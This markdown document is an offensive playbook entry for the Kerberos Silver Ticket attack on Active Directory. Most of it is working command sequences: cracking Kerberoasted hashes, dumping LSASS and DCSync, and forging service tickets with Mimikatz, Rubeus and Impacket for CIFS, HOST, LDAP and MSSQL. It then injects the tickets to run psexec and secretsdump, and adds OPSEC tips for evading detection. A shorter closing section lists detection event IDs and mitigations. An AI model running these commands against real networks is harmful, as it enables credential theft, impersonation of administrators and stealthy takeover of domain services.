attack-12-silver-ticket-attack.md (21036B)
1 --- 2 title: "Attack #12 β Silver Ticket Attack" 3 description: "The Silver Ticket attack is the surgical counterpart to the Golden Ticket. Instead of forging a Ticket Granting Ticket (TGT) with the KRBTGT hash (whichβ¦" 4 category: active-directory 5 subcategory: "Kerberos & Delegation" 6 tags: ["active-directory", "kerberos", "adcs", "credential-access", "ntlm"] 7 tools: ["NetExec", "Impacket", "Mimikatz", "Rubeus", "Hashcat"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Two/π Attack #12 β Silver Ticket Attack.md" 11 --- 12 # π Attack #12 β Silver Ticket Attack 13 14 *** 15 16 ## π How It Works 17 18 The Silver Ticket attack is the **surgical counterpart to the Golden Ticket**. Instead of forging a Ticket Granting Ticket (TGT) with the KRBTGT hash (which grants domain-wide access), an attacker forges a **Ticket Granting Service (TGS) ticket** using the **NTLM hash or AES key of a specific service account**. Because service tickets are encrypted and signed with the target service account's secret, the service accepts the forged ticket as legitimate β and critically, **the TGS is validated entirely by the target service, not the Domain Controller**. The DC is never contacted, which makes Silver Tickets significantly stealthier than Golden Tickets. 19 20 The forged TGS contains a fabricated PAC (Privilege Attribute Certificate) with whatever group memberships and privileges the attacker specifies. Since the target service trusts the PAC without verifying it against the KDC, the attacker can impersonate any user β including Domain Admins β for that specific service only. This makes Silver Tickets ideal for **targeted, persistent access to individual services** like CIFS (file shares), MSSQL, HTTP (web services), LDAP, or HOST (PsExec/scheduled tasks). 21 22 ### What You Need to Forge a Silver Ticket 23 24 | Parameter | Where to Get It | Notes | 25 |---|---|---| 26 | **Service account NT hash** | Kerberoasting, LSASS dump, DCSync, NTDS.dit | The key that encrypts the TGS β this is the core requirement | 27 | **Service account AES256 key** | Mimikatz `sekurlsa::ekeys`, DCSync | Preferred β stealthier, avoids RC4 downgrade detection | 28 | **Domain SID** | `whoami /user`, PowerView, `Get-ADDomain` | e.g. `S-1-5-21-...` β everything before the last RID | 29 | **Domain FQDN** | `$env:USERDNSDOMAIN`, `ipconfig /all` | e.g. `corp.local` | 30 | **Target SPN** | `setspn -L <account>`, PowerView `Get-DomainSPNTicket` | e.g. `CIFS/DC01.corp.local`, `MSSQLSvc/SQL01.corp.local:1433` | 31 | **Target username** | Any valid or fabricated username | The user to impersonate in the forged PAC | 32 33 ### Common Service SPNs and What They Grant 34 35 | SPN Type | Example SPN | What Access It Grants | 36 |---|---|---| 37 | **CIFS** | `CIFS/DC01.corp.local` | SMB file share access, `dir \\DC01\C$` | 38 | **HOST** | `HOST/DC01.corp.local` | PsExec, scheduled tasks, WMI on the target | 39 | **LDAP** | `LDAP/DC01.corp.local` | DCSync-equivalent β replication queries against the DC | 40 | **MSSQLSvc** | `MSSQLSvc/SQL01.corp.local:1433` | SQL Server access as sysadmin | 41 | **HTTP** | `HTTP/WEB01.corp.local` | Web application access (ADFS, Exchange OWA, etc.) | 42 | **WSMAN** | `WSMAN/SRV01.corp.local` | WinRM / Evil-WinRM remote shell | 43 | **RPCSS** | `RPCSS/DC01.corp.local` | DCOM/RPC access on the target | 44 45 ### Golden Ticket vs Silver Ticket Comparison 46 47 | Aspect | Golden Ticket | Silver Ticket | 48 |---|---|---| 49 | **Forges** | TGT (Ticket Granting Ticket) | TGS (Service Ticket) | 50 | **Key required** | KRBTGT hash | Service account hash | 51 | **Scope** | Entire domain β any service | Single service only | 52 | **DC contact** | TGS requests still hit the DC | No DC contact at all | 53 | **Stealth** | Moderate β TGS requests are logged | High β no KDC event logs generated | 54 | **Detection** | 4769 without 4768, encryption anomalies | Very difficult β no DC-side events | 55 | **Prerequisite** | Domain Admin (to get KRBTGT) | Any path to the service account hash | 56 57 ### The Full Attack Flow 58 59 ``` 60 1. Compromise a service account hash (Kerberoasting, LSASS dump, DCSync) 61 2. Identify the target SPN (CIFS, HOST, LDAP, MSSQLSvc, etc.) 62 3. Collect the domain SID 63 4. Forge a Silver Ticket offline (no DC contact needed) 64 5. Inject into current session (kerberos::ptt / Rubeus ptt) 65 6. Access the target service as the forged user 66 7. DC never sees the authentication β no 4768/4769 events generated 67 8. Persist until the service account password is changed 68 ``` 69 70 *** 71 72 ## βοΈ Prerequisites 73 74 | Requirement | Detail | 75 |---|---| 76 | **Service account NT hash or AES key** | Obtained via Kerberoasting (if SPN-registered), LSASS dump, DCSync, or NTDS.dit extraction | 77 | **Domain SID** | Available from any domain-joined host with low-priv access | 78 | **Target SPN** | The Service Principal Name of the service you want to access | 79 | **Network access to target service** | Must be able to reach the service port (445 for CIFS, 1433 for MSSQL, etc.) | 80 81 *** 82 83 ## π οΈ Tools 84 85 | Tool | Platform | Notes | 86 |---|---|---| 87 | **Mimikatz** | Windows | `kerberos::golden` with `/service:` flag β forges Silver Tickets | 88 | **Rubeus** | Windows | `silver` subcommand β cleaner syntax, supports AES | 89 | **Impacket β ticketer.py** | Linux | `-spn` flag for Silver Ticket forging; outputs `.ccache` | 90 | **Impacket β secretsdump.py** | Linux | Extract service account hashes via DCSync | 91 | **Impacket β GetUserSPNs.py** | Linux | Kerberoast to obtain service account hashes | 92 | **CrackMapExec / NetExec** | Linux | `--use-kcache` to authenticate with forged ticket | 93 94 *** 95 96 ## π» Full Commands 97 98 ### π΅ Step 0 β Obtain Target Service Account Hash 99 100 ```powershell 101 # ββ Kerberoasting β crack the service account password hash ββββββββββββββββββ 102 # (Most common path to a Silver Ticket β requires only domain user) 103 104 # Rubeus β request TGS for all kerberoastable accounts 105 .\Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt 106 107 # Crack with hashcat (mode 13100 = Kerberos 5 TGS-REP etype 23) 108 hashcat -m 13100 kerberoast_hashes.txt rockyou.txt --force 109 110 # ββ Direct hash extraction (if you have DA or local admin on the service host) 111 # Mimikatz β dump service account hash from LSASS 112 privilege::debug 113 sekurlsa::logonpasswords 114 # Look for NTLM hash of the service account (e.g. svc_mssql) 115 116 # Or extract AES keys specifically 117 sekurlsa::ekeys 118 # Look for aes256_hmac value for the target service account 119 ``` 120 121 ```bash 122 # ββ Linux β Kerberoast via Impacket ββββββββββββββββββββββββββββββββββββββββββ 123 GetUserSPNs.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 \ 124 -request -outputfile kerberoast_hashes.txt 125 126 # Crack the hash 127 hashcat -m 13100 kerberoast_hashes.txt rockyou.txt --force 128 129 # ββ Linux β DCSync a specific service account ββββββββββββββββββββββββββββββββ 130 secretsdump.py corp.local/Administrator:'Password1'@DC01.corp.local \ 131 -just-dc-user corp.local/svc_mssql 132 133 # Extract the NT hash from output: 134 # corp.local\svc_mssql:1103:aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6::: 135 # ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 136 # This is the NT hash you need 137 ``` 138 139 *** 140 141 ### π΅ Step 0b β Enumerate SPNs for the Target Service 142 143 ```powershell 144 # Windows β multiple methods 145 setspn -L svc_mssql # List SPNs for specific account 146 setspn -Q */* # List ALL SPNs in the domain 147 148 # PowerView 149 Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname 150 151 # Active Directory module 152 Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | 153 Select-Object Name, ServicePrincipalName 154 ``` 155 156 ```bash 157 # Linux β enumerate SPNs 158 GetUserSPNs.py corp.local/low_user:'Password1' -dc-ip 10.10.10.10 159 # Lists all kerberoastable SPNs with their service accounts 160 ``` 161 162 *** 163 164 ### π΄ Mimikatz β Forge & Inject Silver Ticket (Windows) 165 166 ```powershell 167 # ββ Silver Ticket for CIFS β access file shares on DC01 ββββββββββββββββββββββ 168 kerberos::golden \ 169 /user:Administrator \ 170 /domain:corp.local \ 171 /sid:S-1-5-21-3878595448-1012506728-1948843120 \ 172 /target:DC01.corp.local \ 173 /service:CIFS \ 174 /rc4:a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 175 /ptt 176 177 # ββ Flags explained: 178 # /user = username to impersonate (DA or any user) 179 # /domain = domain FQDN 180 # /sid = domain SID 181 # /target = FQDN of the target server hosting the service 182 # /service = service type (CIFS, HOST, LDAP, MSSQLSvc, HTTP, etc.) 183 # /rc4 = NT hash of the service account running the target service 184 # /ptt = inject directly into current session 185 186 # ββ Silver Ticket with AES256 (stealthiest) ββββββββββββββββββββββββββββββββββ 187 kerberos::golden \ 188 /user:Administrator \ 189 /domain:corp.local \ 190 /sid:S-1-5-21-3878595448-1012506728-1948843120 \ 191 /target:DC01.corp.local \ 192 /service:CIFS \ 193 /aes256:b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 194 /ptt 195 196 # ββ Silver Ticket for HOST β enables PsExec / scheduled tasks ββββββββββββββββ 197 kerberos::golden \ 198 /user:Administrator \ 199 /domain:corp.local \ 200 /sid:S-1-5-21-3878595448-1012506728-1948843120 \ 201 /target:DC01.corp.local \ 202 /service:HOST \ 203 /rc4:a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 204 /ptt 205 206 # ββ Silver Ticket for LDAP β DCSync-equivalent without DA ββββββββββββββββββββ 207 # β οΈ Requires the DC's machine account hash (DC01$ computer account) 208 kerberos::golden \ 209 /user:Administrator \ 210 /domain:corp.local \ 211 /sid:S-1-5-21-3878595448-1012506728-1948843120 \ 212 /target:DC01.corp.local \ 213 /service:LDAP \ 214 /rc4:<DC01_MACHINE_ACCOUNT_HASH> \ 215 /ptt 216 # Now you can run: lsadump::dcsync /domain:corp.local /user:krbtgt 217 218 # ββ Silver Ticket for MSSQLSvc β SQL Server as sysadmin ββββββββββββββββββββββ 219 kerberos::golden \ 220 /user:Administrator \ 221 /domain:corp.local \ 222 /sid:S-1-5-21-3878595448-1012506728-1948843120 \ 223 /target:SQL01.corp.local \ 224 /service:MSSQLSvc \ 225 /rc4:a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 226 /ptt 227 228 # ββ Save to .kirbi file (for later use / transfer) βββββββββββββββββββββββββββ 229 kerberos::golden \ 230 /user:Administrator \ 231 /domain:corp.local \ 232 /sid:S-1-5-21-3878595448-1012506728-1948843120 \ 233 /target:DC01.corp.local \ 234 /service:CIFS \ 235 /rc4:a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 236 /ticket:silver_cifs.kirbi 237 238 # Inject saved .kirbi later 239 kerberos::ptt silver_cifs.kirbi 240 241 # ββ Verify injection βββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 242 klist 243 # Should show a ticket for cifs/DC01.corp.local 244 245 # ββ Use the Silver Ticket ββββββββββββββββββββββββββββββββββββββββββββββββββββ 246 dir \\DC01.corp.local\C$ # CIFS ticket 247 psexec.exe \\DC01.corp.local cmd.exe # HOST ticket 248 ``` 249 250 *** 251 252 ### π΄ Rubeus β Forge Silver Ticket (Windows β Modern Approach) 253 254 ```powershell 255 # ββ Silver Ticket with RC4 βββββββββββββββββββββββββββββββββββββββββββββββββββ 256 .\Rubeus.exe silver \ 257 /user:Administrator \ 258 /domain:corp.local \ 259 /sid:S-1-5-21-3878595448-1012506728-1948843120 \ 260 /service:CIFS/DC01.corp.local \ 261 /rc4:a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 262 /ptt /nowrap 263 264 # ββ Silver Ticket with AES256 ββββββββββββββββββββββββββββββββββββββββββββββββ 265 .\Rubeus.exe silver \ 266 /user:Administrator \ 267 /domain:corp.local \ 268 /sid:S-1-5-21-3878595448-1012506728-1948843120 \ 269 /service:CIFS/DC01.corp.local \ 270 /aes256:b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 271 /ptt /nowrap 272 273 # ββ HOST ticket for remote execution βββββββββββββββββββββββββββββββββββββββββ 274 .\Rubeus.exe silver \ 275 /user:Administrator \ 276 /domain:corp.local \ 277 /sid:S-1-5-21-3878595448-1012506728-1948843120 \ 278 /service:HOST/DC01.corp.local \ 279 /rc4:a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 280 /ptt /nowrap 281 282 # ββ Verify βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 283 .\Rubeus.exe triage 284 klist 285 ``` 286 287 *** 288 289 ### π΄ Impacket β ticketer.py (Linux β Forge Silver Ticket) 290 291 ```bash 292 # ββ Forge Silver Ticket for CIFS from Linux βββββββββββββββββββββββββββββββββββ 293 ticketer.py -nthash a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 294 -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \ 295 -domain corp.local \ 296 -spn CIFS/DC01.corp.local \ 297 Administrator 298 # Output: Administrator.ccache 299 300 # ββ Forge using AES256 key ββββββββββββββββββββββββββββββββββββββββββββββββββββ 301 ticketer.py -aesKey b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 302 -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \ 303 -domain corp.local \ 304 -spn CIFS/DC01.corp.local \ 305 Administrator 306 307 # ββ Forge for HOST (PsExec) βββββββββββββββββββββββββββββββββββββββββββββββββββ 308 ticketer.py -nthash a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 309 -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \ 310 -domain corp.local \ 311 -spn HOST/DC01.corp.local \ 312 Administrator 313 314 # ββ Forge for LDAP (DCSync-equivalent) ββββββββββββββββββββββββββββββββββββββββ 315 ticketer.py -nthash <DC01_MACHINE_HASH> \ 316 -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \ 317 -domain corp.local \ 318 -spn LDAP/DC01.corp.local \ 319 Administrator 320 321 # ββ Forge for MSSQLSvc ββββββββββββββββββββββββββββββββββββββββββββββββββββββββ 322 ticketer.py -nthash a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 323 -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \ 324 -domain corp.local \ 325 -spn MSSQLSvc/SQL01.corp.local:1433 \ 326 Administrator 327 328 # ββ Set and use the ticket ββββββββββββββββββββββββββββββββββββββββββββββββββββ 329 export KRB5CCNAME=Administrator.ccache 330 331 # CIFS access 332 smbclient.py -k -no-pass corp.local/Administrator@DC01.corp.local 333 334 # Remote execution (HOST ticket) 335 psexec.py -k -no-pass corp.local/Administrator@DC01.corp.local 336 wmiexec.py -k -no-pass corp.local/Administrator@DC01.corp.local 337 338 # DCSync via LDAP Silver Ticket 339 secretsdump.py -k -no-pass corp.local/Administrator@DC01.corp.local 340 341 # NetExec 342 nxc smb DC01.corp.local --use-kcache 343 nxc smb DC01.corp.local --use-kcache -x "whoami /all" 344 345 # MSSQL access 346 mssqlclient.py -k -no-pass corp.local/Administrator@SQL01.corp.local -windows-auth 347 ``` 348 349 *** 350 351 ### π΄ Multi-Service Silver Ticket Combo (Full Host Takeover) 352 353 ```bash 354 # ββ To fully own a target host, you often need BOTH CIFS + HOST tickets ββββββ 355 # CIFS = file share access | HOST = remote execution 356 357 # Forge CIFS ticket 358 ticketer.py -nthash a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 359 -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \ 360 -domain corp.local \ 361 -spn CIFS/DC01.corp.local \ 362 Administrator 363 364 # Use CIFS ticket to upload tools 365 export KRB5CCNAME=Administrator.ccache 366 smbclient.py -k -no-pass corp.local/Administrator@DC01.corp.local 367 # > put mimikatz.exe 368 369 # Forge HOST ticket (same hash, different SPN) 370 ticketer.py -nthash a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 \ 371 -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \ 372 -domain corp.local \ 373 -spn HOST/DC01.corp.local \ 374 Administrator 375 376 # Use HOST ticket to execute 377 export KRB5CCNAME=Administrator.ccache 378 psexec.py -k -no-pass corp.local/Administrator@DC01.corp.local 379 ``` 380 381 *** 382 383 ## π― OPSEC Tips 384 385 - **Use AES256 over RC4** β RC4-encrypted Silver Tickets produce `EncryptionType: 0x17` in local service logs, which is anomalous in AES-only environments; AES256 (`0x12`) blends with normal traffic 386 - **Target specific services** β a Silver Ticket for CIFS on a single file server is far less suspicious than broad access patterns 387 - **Set realistic ticket lifetimes** β default Mimikatz creates 10-year tickets; set to standard 10-hour lifetime to blend in 388 - **Silver Tickets don't touch the DC** β this is your biggest stealth advantage; there are zero KDC-side event logs generated for the forged ticket 389 - **For LDAP Silver Tickets** β you need the **DC's machine account hash** (DC01$), not a user service account; the LDAP service on a DC runs under the computer account 390 - **Don't generate excessive service tickets** β rapid creation of Silver Tickets for multiple services on the same host correlates in endpoint logs 391 - **Prefer Silver Tickets over Golden Tickets** when you only need access to one service β smaller blast radius means less detection surface 392 393 *** 394 395 ## π‘οΈ Detection β Event IDs 396 397 | Event ID | Source | What to Look For | 398 |---|---|---| 399 | **4624** | Security Log (Target Host) | Logon Type 3 from unexpected source β Silver Tickets bypass the DC, so the logon event only appears on the target server | 400 | **4634** | Security Log (Target Host) | Logoff after suspicious session β correlate with 4624 | 401 | **4672** | Security Log (Target Host) | Special privileges assigned β DA-level access from unexpected user on the target host | 402 | **4769** | Security Log (DC) | **ABSENT** β this is the key indicator; there should be NO 4769 on the DC for a Silver Ticket, because the DC was never contacted | 403 | **4768** | Security Log (DC) | **ABSENT** β no TGT request either; if service access occurs without 4768 + 4769, it's a forged ticket | 404 405 **Primary detection challenge:** Silver Tickets are inherently harder to detect than Golden Tickets because **the Domain Controller is completely bypassed**. The forged TGS is presented directly to the target service, which validates it locally using its own service account key. There are no KDC-side audit events. Detection must rely on **endpoint-level monitoring** β looking for service access events (4624 Type 3) on target servers that have no corresponding TGT/TGS request trail on the DC. Microsoft's PAC validation feature (enabled by default since November 2021 patches) adds a server-side check where the service contacts the DC to validate the PAC, which significantly improves Silver Ticket detection. 406 407 ### PAC Validation β The Silver Ticket Killer 408 409 ``` 410 # Post-November 2021 Windows Updates: 411 # - Services now validate the PAC by contacting the DC 412 # - This means Silver Tickets with fabricated PACs will FAIL on patched systems 413 # - The DC checks if the user actually has the claimed group memberships 414 # - This doesn't kill Silver Tickets entirely β tickets forged with CORRECT 415 # PAC data (real user, real groups) still work 416 # - But you can no longer forge tickets for fake users or fake group memberships 417 ``` 418 419 *** 420 421 ## π Attack Chain Context 422 423 ``` 424 [Silver Ticket] βββ Targeted Service Access 425 β 426 ββββ π CIFS Silver Ticket β SMB file share access (C$, ADMIN$) 427 ββββ π» HOST Silver Ticket β PsExec / scheduled tasks / remote exec 428 ββββ π©Έ LDAP Silver Ticket β DCSync equivalent (needs DC machine hash) 429 ββββ ποΈ MSSQLSvc Silver Ticket β SQL Server sysadmin access 430 ββββ π HTTP Silver Ticket β Web app access (Exchange, ADFS) 431 ββββ π Stealthier than Golden Ticket β no DC event logs 432 ββββ π Survives: password changes of OTHER accounts 433 ββββ π Defeated by: service account password rotation + PAC validation 434 ``` 435 436 **The Silver Ticket persists** until the target service account's password is changed. Unlike Golden Tickets (which require KRBTGT reset Γ 2), a simple password rotation of the compromised service account invalidates all forged Silver Tickets for that service. This is why **Managed Service Accounts (gMSAs)** β which auto-rotate passwords every 30 days β are the strongest mitigation against Silver Ticket persistence. 437 438 *** 439 440 > β **Attack #12 β Silver Ticket complete.**